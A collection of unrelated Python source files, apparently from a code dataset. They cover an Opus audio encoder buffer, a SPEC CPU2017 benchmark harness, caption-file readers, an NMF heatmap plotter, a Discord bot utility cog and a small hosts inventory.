# no work to do # Sanity checks if self._frame_size_ms is None: raise PyOggError("Frame size must be set before encoding") assert self._frame_size_bytes is not None assert self._channels is not None assert self._buffer is not None assert self._buffer_index is not None # Local variable initialisation results = [] pcm_index = 0 pcm_len = len(pcm_bytes) # 'Cast' memoryview of PCM to ctypes Array Buffer = ctypes.c_ubyte * len(pcm_bytes) try: pcm_ctypes = Buffer.from_buffer(pcm_bytes) except TypeError: warnings.warn( "Because PCM was read-only, an extra memory "+ "copy was required; consider storing PCM in "+ "writable memory (for example, bytearray "+ "rather than bytes)." ) pcm_ctypes = Buffer.from_buffer(pcm_bytes) # Either store the encoded packet to return at the end of the # method or immediately call the callback with the encoded # packet. def store_or_callback(encoded_packet: memoryview, samples: int, end_of_stream: bool = False) -> None: if callback is None: # Store the result results.append(( encoded_packet, samples, end_of_stream )) else: # Call the callback callback( encoded_packet, samples, end_of_stream ) # Fill the remainder of the buffer with silence and encode it. # The associated number of samples are only that of actual # data, not the added silence. def flush_buffer() -> None: # Sanity checks to satisfy mypy assert self._buffer_index is not None assert self._channels is not None assert self._buffer is not None # If the buffer is already empty, we have no work to do if self._buffer_index == 0: return # Store the number of samples currently in the buffer samples = ( self._buffer_index // self._channels // ctypes.sizeof(opus.opus_int16) ) # Fill the buffer with silence ctypes.memset( # destination ctypes.byref(self._buffer, self._buffer_index), # value 0, # count len(self._buffer) - self._buffer_index ) # Encode the PCM # As at 2020-11-05, mypy is unaware that ctype Arrays # support the buffer protocol. encoded_packet = self.encode(memoryview(self._buffer)) # type: ignore # Either store the encoded packet or call the # callback store_or_callback(encoded_packet, samples, True) # Copy the data remaining from the provided PCM into the # buffer. Flush if required. def copy_insufficient_data() -> None: # Sanity checks to satisfy mypy assert self._buffer is not None # Calculate remaining data remaining_data = len(pcm_bytes) - pcm_index # Copy the data into the buffer. ctypes.memmove( # destination ctypes.byref(self._buffer, self._buffer_index), # source ctypes.byref(pcm_ctypes, pcm_index), # count remaining_data ) self._buffer_index += remaining_data # If we've been asked to flush the buffer then do so if flush: flush_buffer() # Loop through the provided PCM and the current buffer, # encoding as we have full packets. while True: # There are two possibilities at this point: either we # have previously unencoded data still in the buffer or we # do not if self._buffer_index == 0: # We do not have unencoded data # We are free to progress through the PCM that has # been provided encoding frames without copying any # bytes. Once there is insufficient data remaining # for a complete frame, that data should be copied # into the buffer and we have finished. if pcm_len - pcm_index > self._frame_size_bytes: # We have enough data remaining in the provided # PCM to encode more than an entire frame without # copying any data. Unfortunately, splicing a # ctypes array copies the array. To avoid the # copy we use memoryview see # https://mattgwwalker.wordpress.com/2020/12/12/python-ctypes-slicing/ frame_data = memoryview(pcm_bytes)[ pcm_index:pcm_index+self._frame_size_bytes ] # Update the PCM index pcm_index += self._frame_size_bytes # Store number of samples (per channel) of actual # data samples = ( len(frame_data) // self._channels // ctypes.sizeof(opus.opus_int16) ) # Encode the PCM encoded_packet = super().encode(frame_data) # Either store the encoded packet or call the # callback store_or_callback(encoded_packet, samples) else: # We do not have enough data to fill a frame while # still having data left over. Copy the data into # the buffer. copy_insufficient_data() return results else: # We have unencoded data. # Copy the provided PCM into the buffer (up until the # buffer is full). If we can fill it, then we can # encode the filled buffer and continue. If we can't # fill it then we've finished. data_required = len(self._buffer) - self._buffer_index if pcm_len > data_required: # We have sufficient data to fill the buffer and # have data left over. Copy data into the buffer. assert pcm_index == 0 remaining = len(self._buffer) - self._buffer_index ctypes.memmove( # destination ctypes.byref(self._buffer, self._buffer_index), # source pcm_ctypes, # count remaining ) pcm_index += remaining self._buffer_index += remaining assert self._buffer_index == len(self._buffer) # Encode the PCM encoded_packet = super().encode( # Memoryviews of ctypes do work, even though # mypy complains. memoryview(self._buffer) # type: ignore ) # Store number of samples (per channel) of actual # data samples = ( self._buffer_index // self._channels // ctypes.sizeof(opus.opus_int16) ) # We've now processed the buffer self._buffer_index = 0 # Either store the encoded packet or call the # callback store_or_callback(encoded_packet, samples) else: # We have insufficient data to fill the buffer # while still having data left over. Copy the # data into the buffer. copy_insufficient_data() return results def _calc_frame_size(self): """Calculates the number of bytes in a frame. If the frame size (in milliseconds) and the number of samples per seconds have already been specified, then the frame size in bytes is set. Otherwise, this method does nothing. The frame size is measured in bytes required to store the sample. """ if (self._frame_size_ms is None or self._samples_per_second is None): return self._frame_size_bytes = ( self._frame_size_ms * self._samples_per_second // 1000 * ctypes.sizeof(opus.opus_int16) * self._channels ) # Allocate space for the buffer Buffer = ctypes.c_ubyte * self._frame_size_bytes self._buffer = Buffer() def _get_next_frame(self, add_silence=False): """Gets the next Opus-encoded frame. Returns a tuple where the first item is the Opus-encoded frame and the second item is the number of encoded samples (per channel). Returns None if insufficient data is available. """ next_frame = bytes() samples = 0 # Ensure frame size has been specified if self._frame_size_bytes is None: raise PyOggError( "Desired frame size hasn't been set. Perhaps "+ "encode() was called before set_frame_size() "+ "and set_sampling_frequency()?" ) # Check if there's insufficient data in the buffer to fill # a frame. if self._frame_size_bytes > self._buffer_size: if len(self._buffer) == 0: # No data at all in buffer return None if add_silence: # Get all remaining data while len(self._buffer) != 0: next_frame += self._buffer.popleft() self._buffer_size = 0 # Store number of samples (per channel) of actual # data samples = ( len(next_frame) // self._channels // ctypes.sizeof(opus.opus_int16) ) # Fill remainder of frame with silence bytes_remaining = self._frame_size_bytes - len(next_frame) next_frame += b'\x00' * bytes_remaining return (next_frame, samples) else: # Insufficient data to fill a frame and we're not # adding silence return None bytes_remaining = self._frame_size_bytes while bytes_remaining > 0: if len(self._buffer[0]) <= bytes_remaining: # Take the whole first item buffer_ = self._buffer.popleft() next_frame += buffer_ bytes_remaining -= len(buffer_) self._buffer_size -= len(buffer_) else: # Take only part of the buffer # TODO: This could be more efficiently # implemented. Rather than appending back the # remaining data, we could just update an index # saying where we were up to in regards to the # first entry of the buffer. buffer_ = self._buffer.popleft() next_frame += buffer_[:bytes_remaining] self._buffer_size -= bytes_remaining # And put the unused part back into the buffer self._buffer.appendleft(buffer_[bytes_remaining:]) bytes_remaining = 0 # Calculate number of samples (per channel) samples = ( len(next_frame) // self._channels // ctypes.sizeof(opus.opus_int16) ) return (next_frame, samples)
11589436
from lapidary.config.specbench.Benchmark import Benchmark from enum import Enum from pathlib import Path import os import shutil class Spec2017Bench: class Benchmarks(Enum): PERL = '500.perlbench_r' GCC = '502.gcc_r' BWAVES = '503.bwaves_r' MCF = '505.mcf_r' CACTUS = '507.cactuBSSN_r' NAMD = '508.namd_r' PAREST = '510.parest_r' POVRAY = '511.povray_r' LBM = '519.lbm_r' OMNETPP = '520.omnetpp_r' WRF = '521.wrf_r' XALAN = '523.xalancbmk_r' X264 = '525.x264_r' BLENDER = '526.blender_r' CAM4 = '527.cam4_r' DEEPSJENG = '531.deepsjeng_r' IMAGICK = '538.imagick_r' LEELA = '541.leela_r' NAB = '544.nab_r' EXCHANGE2 = '548.exchange2_r' FOTONIK3D = '549.fotonik3d_r' ROMS = '554.roms_r' XZ = '557.xz_r' BENCHMARKS = [b.value for b in Benchmarks] BIN_NAMES = { Benchmarks.PERL.value: 'perlbench_r', Benchmarks.GCC.value: 'cpugcc_r', Benchmarks.BWAVES.value: 'bwaves_r', Benchmarks.MCF.value: 'mcf_r', Benchmarks.CACTUS.value: 'cactusBSSN_r', Benchmarks.NAMD.value: 'namd_r', Benchmarks.PAREST.value: 'parest_r', Benchmarks.POVRAY.value: 'povray_r', Benchmarks.LBM.value: 'lbm_r', Benchmarks.OMNETPP.value: 'omnetpp_r', Benchmarks.WRF.value: 'wrf_r', Benchmarks.XALAN.value: 'cpuxalan_r', Benchmarks.X264.value: 'x264_r', Benchmarks.BLENDER.value: 'blender_r', Benchmarks.CAM4.value: 'cam4_r', Benchmarks.DEEPSJENG.value: 'deepsjeng_r', Benchmarks.IMAGICK.value: 'imagick_r', Benchmarks.LEELA.value: 'leela_r', Benchmarks.NAB.value: 'nab_r', Benchmarks.EXCHANGE2.value: 'exchange2_r', Benchmarks.FOTONIK3D.value: 'fotonik3d_r', Benchmarks.ROMS.value: 'roms_r', Benchmarks.XZ.value: 'xz_r' } INPUT_TYPES = ['refrate', 'refspeed', 'test', 'train'] # Args # - Files consumed as arguments INPUT_FILES = { Benchmarks.PERL.value: ['checkspam.pl'], Benchmarks.GCC.value: ['ref32.c'], Benchmarks.MCF.value: ['inp.in'], Benchmarks.CACTUS.value: ['spec_ref.par'], Benchmarks.PAREST.value: ['ref.prm'], Benchmarks.POVRAY.value: ['SPEC-benchmark-ref.ini'], Benchmarks.OMNETPP.value: ['omnetpp.ini'], Benchmarks.XALAN.value: ['t5.xml', 'xalanc.xsl'], Benchmarks.X264.value: ['BuckBunny.yuv'], Benchmarks.BLENDER.value: ['sh3_no_char.blend'], Benchmarks.DEEPSJENG.value: ['ref.txt'], Benchmarks.LEELA.value: ['ref.sgf'], Benchmarks.XZ.value: ['../../all/input/cld.tar.xz'] } # - Files consumed when piped from stdin STDIN_FILES = { Benchmarks.BWAVES.value: 'bwaves_1.in', Benchmarks.ROMS.value: 'ocean_benchmark2.in.x', } # - Files which contain command line arguments ARGS_FILES = { Benchmarks.PERL.value: 'checkspam.in', Benchmarks.NAMD.value: 'namd.in', Benchmarks.LBM.value: 'lbm.in', Benchmarks.NAB.value: 'control', Benchmarks.EXCHANGE2.value: 'control', } # - Used for script-like benchmarks that link with other scripts LIB_DIR = { Benchmarks.PERL.value: 'lib', } # - All other arguments that are static MISC_ARGS = { Benchmarks.GCC.value: [ '-O3', '-fselective-scheduling', '-fselective-scheduling2' ], Benchmarks.X264.value: [ '--crf', '0', '-o', 'x264.out' ], } # - Commands to run before we can execute the benchmark. Can also return # arguments. @staticmethod def _povray_setup(b, i, d): shutil.copy('{}/{}/{}/input/SPEC-benchmark-ref.pov'.format(d, b, i), './SPEC-benchmark-ref.pov') return [ '+L{}/{}/all/input'.format(d, b) ] @staticmethod def _wrf_setup(b, i, d): from glob import glob shutil.copy('{}/{}/{}/input/namelist.input'.format(d, b, i), './namelist.input') for f in glob('{}/{}/all/input/*'.format(d, b)): shutil.copy(f, '.') def _x264_setup(self, b, i, d): from subprocess import run, DEVNULL real_input = Path(d) / b / i / 'input' / 'BuckBunny.yuv' if not real_input.exists(): unprocessed_input = Path(d) / b / i / 'input' / 'BuckBunny.264' decode_bin = self.bin_dir / 'ldecod_r' decode_args = [ str(decode_bin), '-p', 'InputFile={}'.format(str(unprocessed_input)), '-p', 'OutputFile={}'.format(str(real_input)) ] proc = run(decode_args, stdout=DEVNULL, stderr=DEVNULL) if proc.returncode != 0: raise Exception('Could not decode input file') return ['1280x720'] @staticmethod def _cam4_setup(b, i, d): input_dir = Path(d) / b / i / 'input' common_dir = Path(d) / b / 'all' / 'input' assert input_dir.exists() and common_dir.exists() all_files = itertools.chain(input_dir.iterdir(), common_dir.iterdir()) for fp in all_files: shutil.copy(str(fp), '.') @staticmethod def _imagick_setup(b, i, d): input_file = Path(d) / b / i / 'input' / 'refrate_input.tga' assert input_file.exists() shutil.copy(str(input_file), '.') return ['refrate_convert.out', 'refrate_convert.err', '-limit', 'disk', '0', 'refrate_input.tga', '-edge', '41', '-resample', '181%', '-emboss', '31', '-colorspace', 'YUV', '-mean-shift', '19x19+15%', '-resize', '3', '0%', 'refrate_output.tga'] @staticmethod def _fotonik3d_setup(b, i, d): input_dir = Path(d) / b / i / 'input' assert input_dir.exists() for f in input_dir.iterdir(): if '.xz' in f.name: os.system('xz -d -k {}'.format(str(f))) new_file = Path(str(f).replace('.xz', '')) if not (Path('.') / new_file.name).exists(): shutil.move(str(new_file), '.') elif not (Path('.') / f.name).exists(): shutil.copy(str(f), '.') SETUP_FNS = { Benchmarks.NAMD.value: lambda _, b, i, d: shutil.copy( '{}/{}/all/input/apoa1.input'.format(d, b), './apoa1.input'), Benchmarks.POVRAY.value: lambda _, b, i, d: Spec2017Bench._povray_setup(b, i, d), Benchmarks.LBM.value: lambda _, b, i, d: shutil.copy( '{}/{}/{}/input/100_100_130_ldc.of'.format(d, b, i), './100_100_130_ldc.of'), Benchmarks.OMNETPP.value: lambda _, b, i, d: shutil.copytree( '{}/{}/all/input/ned'.format(d, b), '{}/{}/{}/input/ned'.format(d, b, i)) if not (Path(d) / b / i / 'input/ned').exists() else None, Benchmarks.WRF.value: lambda _, b, i, d: Spec2017Bench._wrf_setup(b, i, d), Benchmarks.X264.value: lambda obj, b, i, d: obj._x264_setup(b, i, d), Benchmarks.BLENDER.value: lambda *_, **__: ['--background', '--render-frame', '1', '--render-output', '.'], Benchmarks.CAM4.value: lambda _, b, i, d: Spec2017Bench._cam4_setup(b, i, d), Benchmarks.IMAGICK.value: lambda _, b, i, d: Spec2017Bench._imagick_setup(b, i, d), Benchmarks.NAB.value: lambda _, b, i, d: shutil.copytree( '{}/{}/{}/input/1am0'.format(d, b, i), './1am0') \ if not Path('./1am0').exists() else None, Benchmarks.EXCHANGE2.value: lambda _, b, i, d: shutil.copy( '{}/{}/all/input/puzzles.txt'.format(d, b), './puzzles.txt'), Benchmarks.FOTONIK3D.value: lambda _, b, i, d: Spec2017Bench._fotonik3d_setup(b, i, d), Benchmarks.ROMS.value: lambda _, b, i, d: shutil.copy( '{}/{}/all/input/varinfo.dat'.format(d, b), '.'), Benchmarks.XZ.value: lambda *_, **__: [ '216.3MiB', ('19cf30ae51eddcbefda78dd06014b4b96281456e078ca7c13e1c0c9e6aaea8df' 'f3efb4ad6b0456697718cede6bd5454852652806a657bb56e07d61128434b474'), '160', '59,796,407', '61,004,416', '6'] } def _create_input_dir(self): spec_inner = self.spec_src_path / 'benchspec' / 'CPU' assert spec_inner.exists() if not self.input_dir.exists(): self.input_dir.mkdir() for bench in self.Benchmarks: input_target = spec_inner / bench.value / 'data' input_linkname = self.input_dir / bench.value input_linkname.symlink_to(input_target) def _init_dir_structure(self): if self.workspace_path.exists(): return # Now we want to set up the bin, input, and lib dirs for each benchmark self.workspace_path.mkdir() self.src_dir.mkdir() self.lib_dir.mkdir() self.input_dir.mkdir() spec_inner = self.spec_src_path / 'benchspec' / 'CPU' assert spec_inner.exists() for bench in self.Benchmarks: # Sources src_target = list((spec_inner / bench.value / 'build').glob('build_*')) assert src_target and len(src_target) == 1 src_linkname = self.src_dir / bench.value src_linkname.symlink_to(src_target[0]) # Inputs input_target = spec_inner / bench.value / 'data' input_linkname = self.input_dir / bench.value input_linkname.symlink_to(input_target) if bench.value in self.LIB_DIR: lib_target = list((spec_inner / bench.value / 'run' ).glob('run_*')) assert lib_target lib_linkname = self.lib_dir / bench.value lib_linkname.symlink_to(lib_target[0]) # Also link in the Makefile. class_makefile = Path(__file__).parent / 'Makefile' assert class_makefile.exists() self.makefile.symlink_to(class_makefile) def _make_binaries(self): if self.bin_dir.exists() and len(list(self.bin_dir.iterdir())) > 2: return import subprocess import shlex cmd = shlex.split('make SPEC17_ROOT={} -C {} -j{}'.format( self.spec_src_path, self.workspace_path, os.cpu_count())) subprocess.check_call(cmd) def __init__(self, spec_src_path, workspace_path): assert spec_src_path is not None and workspace_path is not None assert isinstance(spec_src_path, Path) and spec_src_path.exists() self.spec_src_path = spec_src_path self.workspace_path = workspace_path self.src_dir = workspace_path / 'src' self.bin_dir = workspace_path / 'bin' self.lib_dir = workspace_path / 'lib' self.input_dir = workspace_path / 'data' self.makefile = workspace_path / 'Makefile' def _get_input_file_args(self, bench_name, input_type): if bench_name not in self.__class__.INPUT_FILES: return [] input_file_args = [] input_file_names = self.__class__.INPUT_FILES[bench_name] parent_dir = self.input_dir / bench_name / input_type / 'input' if not parent_dir.exists(): self._create_input_dir() for infile in input_file_names: input_path = parent_dir / infile assert input_path.exists() input_file_args += [str(input_path.resolve())] return input_file_args def _get_stdin_args(self, bench_name, input_type): if bench_name not in Spec2017Bench.STDIN_FILES: return [] stdin_file_name = Spec2017Bench.STDIN_FILES[bench_name] stdin_path = self.input_dir / bench_name / input_type / 'input' / stdin_file_name assert stdin_path.exists() return [ '<', str(stdin_path) ] def _get_cmdline_args(self, bench_name, input_type): if bench_name not in self.__class__.ARGS_FILES: return [] args_file_name = self.__class__.ARGS_FILES[bench_name] args_file_path = self.input_dir / bench_name / input_type / 'input' / args_file_name assert args_file_path.exists() with args_file_path.open() as f: lines = f.readlines() args_raw = lines[-1].strip().replace('\t', ' ') return args_raw.split(' ') def _get_lib_args(self, bench_name): if bench_name not in self.__class__.LIB_DIR: return [] lib_dir_name = self.__class__.LIB_DIR[bench_name] lib_dir_path = self.lib_dir / bench_name / lib_dir_name assert lib_dir_path.exists() return ['-I', str(lib_dir_path)] def _get_misc_args(self, bench_name): if bench_name not in self.MISC_ARGS: return [] return self.MISC_ARGS[bench_name] def _get_setup_fn_args(self, bench_name, input_type): fn = lambda *_, **__: None if bench_name in self.__class__.SETUP_FNS: fn = self.__class__.SETUP_FNS[bench_name] maybe_args = fn(self, bench_name, input_type, self.input_dir) if isinstance(maybe_args, list): return maybe_args return [] def _get_bin_path(self, bench_name): assert self.bin_dir.exists() bin_name = Spec2017Bench.BIN_NAMES[bench_name] bin_path = self.bin_dir / bin_name assert bin_path.exists() return bin_path def create(self, bench_name, input_type): assert bench_name in Spec2017Bench.BENCHMARKS assert input_type in Spec2017Bench.INPUT_TYPES self._init_dir_structure() self._make_binaries() bin_path = self._get_bin_path(bench_name) setup_args = self._get_setup_fn_args(bench_name, input_type) input_args = self._get_input_file_args(bench_name, input_type) lib_args = self._get_lib_args(bench_name) misc_args = self._get_misc_args(bench_name) stdin_args = self._get_stdin_args(bench_name, input_type) cmdline_args = self._get_cmdline_args(bench_name, input_type) args = lib_args + misc_args + input_args + cmdline_args + stdin_args + setup_args print(str(bin_path) + ' ' + ' '.join(args)) return Benchmark(bin_path, args)
11589437
import json import numpy as np def check_img_list(sentid, imgid): true_imgid = sentid.split('#')[0] if true_imgid.endswith('.jpg') or true_imgid.endswith('.mp4'): true_imgid = true_imgid[:-4] if true_imgid== imgid: return 1 else: return 0 def readSentsInfo(inputfile): sent_ids = [] sents = [] id2sents = {} for line in open(inputfile): data = line.strip().split(' ', 1) sent_ids.append(data[0]) sents.append(data[1]) id2sents[data[0]] = data[1] return (sent_ids, sents, id2sents) def readImgSents(inputfile): sent_ids = [] img_list = [] sents = [] for line in open(inputfile): data = line.strip().split(' ', 1) sent_ids.append(data[0]) sents.append(data[1]) img = data[0].split("#")[0].strip().split('.jpg')[0] if img not in img_list: img_list.append(img) else: assert img_list[-1] == img return img_list, sent_ids, sents
11589445
import matplotlib.pyplot as plt import seaborn as sns import pandas as pd from typing import Union import numpy as np import pandas as pd from ._utils import series_to_colors from ._utils import color_list_to_matrix_and_cmap def marker_heatmap( X: pd.DataFrame, signatures: pd.DataFrame, order_series: pd.Series, subset_genes: Union[pd.Series,None] = None, diff: float = 0.5, max_norm: float = 0.5, figsize: tuple = (16,12), cmap: str ="YlGnBu", display_y: bool = False, vmax: float = None, vmin: float = None, cohort_s: Union[pd.Series,None] = None, y_hm_label: str = 'Genes', cbar_hm_label: str = 'Normalized Expression' ): """ Plot marker map. ----------------------------- Args: * X: pd.DataFrame of input sample x feature matrix * signatures: pd.DataFrame signatures output; this bundles information about the weightings of each feature (ex. gene) and what signature they map to * order_series: series of samples mapping to subgroups index: X.index values: subgrouping * subset_series: a pd.Series with the index as the gene name or ID that matches the marker matrix & has a "Subgroup" column for labeling * diff: difference of loading for called signature vs. rest * max_norm: strength of loading for called signature * figsize: size of figure * cmap: colormap for plot * display_y: whether or not to display feature names * vmax: colorbar max * vmin: colorbar min * cohort_s: cohort_series dataframe (added on top of plot) * y_hm_label: label of y-axis on heatmap (ex. Genes, Protein LFC, etc.) * cbar_hm_label: label of heatmap colorbar Returns: * plt.Figure """ # Filter for marker genes signatures_filt = signatures[(signatures['diff'] > diff) & (signatures['max_norm'] > max_norm)] # Remove signatures with no marker genes associated order_series = order_series[order_series.isin(set(signatures_filt['max_id'].astype(int)))] # Filter X matrix sample_markers = X.loc[signatures_filt.index, order_series.sort_values().index] # Set horizontal lines hz_lines = np.unique(sample_markers.join(signatures_filt).loc[:,'max_id'].values, return_index=True)[1] fig, ax = plt.subplots(figsize=figsize) x0 = ax.get_position().x0 x1 = ax.get_position().x1 y0 = ax.get_position().y0 y1 = ax.get_position().y1 buf = y1*0.01 cbar_ax = fig.add_axes([.91, 0.5, .025, .3]) sns.heatmap(sample_markers, ax=ax, cmap=cmap, rasterized=True, cbar_ax=cbar_ax, vmax=vmax, vmin=vmin) v,c = np.unique(order_series, return_counts=True) # plot horizontal lines _c = np.cumsum(c) _ci = np.roll(_c,2) _ci[0] = 0 _ci[1] = 0 ax.hlines(hz_lines, _ci, _c, rasterized=True) # plot vertical lines _h = list(hz_lines) _h.append(sample_markers.shape[0]) ax.vlines(np.cumsum(c)[:-1], _h[:-2], _h[2:], rasterized=True) ax.vlines(np.cumsum(c)[:-1], 0, sample_markers.shape[0], alpha=0.4, rasterized=True) # set ticks ax.set_xticks(np.cumsum(c)-c/2) ax.set_xticklabels(v, rotation=360,fontsize=14) ax.set_yticks(np.arange(sample_markers.index.values.shape[0])) # add gene markings if subset_genes is not None: ax.set_yticks([]) ax.set_yticklabels([], rasterized=True) lax = fig.add_axes([x0-3*buf, y0, 2*buf, y1-y0]) lax.set_xticks([]) lax.set_yticks([]) meta = sample_markers.drop(columns=list(sample_markers)).join(subset_genes).iloc[:,0] colors_conversion, meta_colormap = series_to_colors(meta) meta_colormap_inv = dict([[v,k] for k,v in meta_colormap.items()]) meta_colormap_inv = {(k[0],k[1],k[2]):v for k,v in meta_colormap_inv.items()} cbar_lax = fig.add_axes([0.06, 0.68, 2*buf, .2]) # Add heatmapping mat,cmap = color_list_to_matrix_and_cmap(colors_conversion) sns.heatmap( mat.T, cmap=cmap, ax=lax, yticklabels=False, xticklabels=False, cbar=True, cbar_ax=cbar_lax, ) cb_ticks = [float(t.get_text().replace('−','-')) for t in cbar_lax.get_yticklabels()] color_value_mapping = dict() for v in np.unique(mat): color_code = list(cmap.__call__(v)) color_code = tuple(color_code[:3]) color_value_mapping[v] = meta_colormap_inv[color_code] cbar_lax.get_yaxis().set_ticks([]) n_labels = len(list(color_value_mapping.keys())) vals = [x * ((n_labels)/(n_labels+1)) + 0.5 * ((n_labels)/(n_labels+1)) for x in list(color_value_mapping.keys())] cbar_lax.get_yaxis().set_ticks(vals) cbar_lax.get_yaxis().set_ticklabels(list(color_value_mapping.values()),) cbar_lax.yaxis.set_ticks_position('left') cbar_lax.set_frame_on(True) lax.set_ylabel('Marker Genes', fontsize=14) ax.set_ylabel("") for _, spine in lax.spines.items(): spine.set_visible(True) # --------------subset genes------------------- else: if display_y: ax.set_yticklabels(sample_markers.index.values, fontsize=5, rasterized=True) else: ax.set_yticks([]) ax.set_yticklabels([], rasterized=True) ax.set_ylabel(y_hm_label, fontsize=14) # Add sample anont if cohort_s is not None: # Get ordering and samples cohort_s = cohort_s.loc[sample_markers.columns] # Create axis cs_ax = fig.add_axes([x0, y1+2*buf, x1*.86, 2*buf]) cs_ax.set_xticks([]) cs_ax.set_yticks([]) cbar_cs_ax = fig.add_axes([x0, y1+6*buf, x1*.25, 2*buf]) colors_conversion, meta_colormap = series_to_colors(cohort_s) meta_colormap_inv = dict([[v,k] for k,v in meta_colormap.items()]) meta_colormap_inv = {(k[0],k[1],k[2]):v for k,v in meta_colormap_inv.items()} mat,cmap = color_list_to_matrix_and_cmap(colors_conversion) sns.heatmap( mat, cmap=cmap, ax=cs_ax, yticklabels=False, xticklabels=False, cbar=True, cbar_ax=cbar_cs_ax, cbar_kws={"orientation": "horizontal"} ) cb_ticks = [float(t.get_text().replace('−','-')) for t in cbar_cs_ax.get_yticklabels()] color_value_mapping = dict() for v in np.unique(mat): color_code = list(cmap.__call__(v)) color_code = tuple(color_code[:3]) color_value_mapping[v] = meta_colormap_inv[color_code] cbar_cs_ax.get_xaxis().set_ticks([]) n_labels = len(list(color_value_mapping.keys())) vals = [x * ((n_labels)/(n_labels+1)) + 0.5 * ((n_labels)/(n_labels+1)) for x in list(color_value_mapping.keys())] cbar_cs_ax.get_xaxis().set_ticks(vals) cbar_cs_ax.get_xaxis().set_ticklabels(list(color_value_mapping.values())) cbar_cs_ax.xaxis.set_ticks_position('top') cbar_cs_ax.set_frame_on(True) [spine.set_visible(True) for _, spine in cs_ax.spines.items()] # --------------sample annot------------------- ax.set_title('') ax.set_xlabel('NMF Signatures', fontsize=14) cbar_ax.set_ylabel(cbar_hm_label, fontsize=12) [spine.set_visible(True) for _, spine in ax.spines.items()] return fig
11589463
import discord from discord.ext import commands import variables as var from functions import get_prefix import database as db class Extras(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() async def ping(self, ctx): await ctx.send( f"Pong 🏓! Response time: {round(self.bot.latency * 1000)}ms" ) @commands.command(aliases=["userinfo"]) async def user(self, ctx, user:discord.User=None): if not user: user = ctx.author embed = discord.Embed( title=f"{user} info", color=var.C_MAIN ) embed.set_thumbnail(url=user.avatar.url) embed.add_field(name="ID", value=user.id, inline=False) embed.add_field(name="Account created", value=user.created_at.strftime("%B %d, %Y"), inline=False) embed.add_field(name="Bot", value=user.bot, inline=False) await ctx.send(embed=embed) @commands.command(aliases=["memberinfo"]) async def member(self, ctx, member:discord.Member=None): if not member: member = ctx.author if member.status == discord.Status.online: status = "<:online:313956277808005120>" elif member.status == discord.Status.idle: status = "<:away:313956277220802560>" elif member.status == discord.Status.dnd: status = "<:dnd:313956276893646850>" elif member.status == discord.Status.offline: status = "<:offline:313956277237710868>" else: status = "<:invisible:313956277107556352>" embed = discord.Embed( title=f"{member} info", description=status, color=var.C_MAIN ) embed.set_thumbnail(url=member.avatar.url) embed.add_field( name="Roles", value=" ".join(role.mention for role in member.roles ), inline=False) embed.add_field(name="Nickname", value=member.nick, inline=False) embed.add_field(name="Status", value=member.status, inline=False) embed.add_field(name="Joined at", value=member.joined_at.strftime("%B %d, %Y"), inline=False) embed.add_field(name="ID", value=member.id, inline=False) await ctx.send(embed=embed) @commands.command() async def source(self, ctx): embed = discord.Embed( title="My Github Source Code Woohoo", description="[GitBolt - Axiol](https://github.com/GitBolt/Axiol)", color=var.C_TEAL ).set_thumbnail( url=( "https://cdn0.iconfinder.com/data/" "icons/shift-logotypes/32/Github-512.png" ) ) await ctx.send(embed=embed) @commands.command() async def invite(self, ctx): embed = discord.Embed( title="My invite link!", description=( "[Invite me from here]" "(https://discord.com/oauth2/authorize?client_id=843484459113775114&permissions=473295959&scope=bot)" ), color=var.C_BLUE ).set_thumbnail( url=( "https://cdn.discordapp.com/attachments/843519647055609856/" "845662999686414336/Logo1.png" ) ) await ctx.send(embed=embed) @commands.command() async def suggest(self, ctx, *, desc=None): if desc is not None: # Support server suggestion channel channel = self.bot.get_channel(843548616505294848) embed = discord.Embed( title=f"{ctx.author}'s idea", description=( f"This idea came from a server named **{ctx.guild.name}**!" ), color=var.C_BLUE ).add_field( name="Suggestion", value=desc ) msg = await channel.send(embed=embed) await msg.add_reaction(var.E_ACCEPT) await msg.add_reaction(var.E_DECLINE) await ctx.send("Suggestion sent to the support server!") else: await ctx.send( f"You need to describe your idea too! This is the format\n" f"```{await get_prefix(ctx)} <description of your idea>```\n" f"Don't forget the space after prefix :D" ) @commands.command(aliases=["bot", "info"]) async def about(self, ctx): guild_count = 0 member_count = 0 ping = f"{round(self.bot.latency * 1000)}ms" for guild in self.bot.guilds: guild_count += 1 member_count += guild.member_count embed = discord.Embed( title="Some information about me :flushed:", description=( f"[Donation](https://paypal.me/palbolt) " f"[Vote](https://top.gg/bot/843484459113775114/vote) " f"[Support](https://discord.gg/6xVasmDVaE)" ), color=var.C_MAIN ).add_field( name="Server Count", value=str(guild_count), inline=False ).add_field( name="Members", value=member_count, inline=False ).add_field( name="Made by", value="Bolt#8905", inline=False ).add_field( name="Creation date", value="16 May, 2021", inline=False ).set_footer( text=f"Ping: {ping}" ).set_thumbnail( url=( "https://cdn.discordapp.com/attachments/843519647055609856/" "845662999686414336/Logo1.png" ) ) await ctx.send(embed=embed) @commands.command() async def stats(self, ctx): embed = discord.Embed( title=f"{ctx.guild.name}", color=var.C_TEAL ) embed.add_field(name="Owner", value=ctx.guild.owner, inline=False) embed.add_field( name="All Members", value=ctx.guild.member_count, inline=False ) embed.add_field( name="Channels", value=str(len(ctx.guild.channels)), inline=False ) embed.add_field( name="Voice Channels", value=str(len(ctx.guild.voice_channels)), inline=False ) embed.add_field( name="Roles", value=str(len(ctx.guild.roles)), inline=False ) embed.add_field( name="Boost Level", value=ctx.guild.premium_tier, inline=False ) embed.add_field( name="Created at", value=str(ctx.guild.created_at.strftime("%Y - %m - %d")), inline=False ) embed.set_thumbnail(url=ctx.guild.icon.url) guild_verify_doc = await db.VERIFY.find_one({"_id": ctx.guild.id}) if guild_verify_doc is not None: role = ctx.guild.get_role(guild_verify_doc.get("roleid")) count = sum(role in member.roles for member in ctx.guild.members) embed.add_field(name="Non Verified Members", value=str(count)) await ctx.send(embed=embed) def setup(bot): bot.add_cog(Extras(bot))
11589467
hosts = ([ 'somehost', ('anotherhost', {'ssh_port': 1022}), ], {}) generator_hosts = (host for host in ('hosta', 'hostb'))
11589476
